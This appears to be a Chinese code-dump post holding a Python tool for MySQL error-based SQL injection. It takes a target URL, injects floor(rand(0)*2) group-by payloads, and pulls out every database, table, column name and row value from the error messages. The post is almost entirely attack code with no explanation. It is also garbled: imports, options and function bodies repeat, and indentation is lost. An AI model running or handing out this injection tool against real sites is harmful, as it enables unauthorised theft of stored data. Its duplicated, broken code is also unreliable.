代码展示墙:
关于注释和解析以后会补上
现在只是先将代码保存在这里
# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
import re
import requests
import sys
import hashlib
from optparse import OptionParser
import re
parser=OptionParser()
parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
(options,args) = parser.parse_args()
def main():
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
getAllDatabases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
getAllTables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
getAllColumnsByTable(options.url,options.table,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.column,options.table,options.database)
def http_get(url):
a=requests.get(url)
return a.content
a=requests.get(url)
return a.content
def getAllDatabases(url):
db_number_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(schema_name),'^_^') from information_schema.schemata),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) "
html=http_get(db_number_payload)
htmlc=str(html)
db_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc,re.M).group(1))
for i in range(db_number):
db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',schema_name,'^_^') from information_schema.schemata limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
db_name_get=http_get(db_name_payload)
db_name_res=str(db_name_get)
db_name_res_re=re.search(r'\^_\^(.*?)\^_\^',db_name_res,re.M)
db_name=db_name_res_re.group(1)
print(db_name)
def getAllTables(url,database):
db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
html=str(http_get(db_table_payload))
db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
for i in range(db_table_number):
db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
htmlc=str(http_get(db_name_payload))
db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
print(db_table_name)
db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
html=str(http_get(db_table_payload))
db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
for i in range(db_table_number):
db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
htmlc=str(http_get(db_name_payload))
db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
print(db_table_name)
def getAllColumnsByTable(url,table,database):
db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
htmlc=str(http_get(db_cl_payload))
db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
#print(db_cl_number)
for i in range(db_cl_number):
db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
html_cl=str(http_get(db_cl_name_payload))
db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
print(db_cl_name)
db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
htmlc=str(http_get(db_cl_payload))
db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
#print(db_cl_number)
for i in range(db_cl_number):
db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
html_cl=str(http_get(db_cl_name_payload))
db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
print(db_cl_name)
def getAllContent(url,column,table,database):
db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
htmlc=str(http_get(db_ct_payload))
db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
for i in range(db_ct_number):
db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
html_cl=str(http_get(db_ct_name_payload))
db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
print(db_ct_string)
db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
htmlc=str(http_get(db_ct_payload))
db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
for i in range(db_ct_number):
db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
html_cl=str(http_get(db_ct_name_payload))
db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
print(db_ct_string)
main()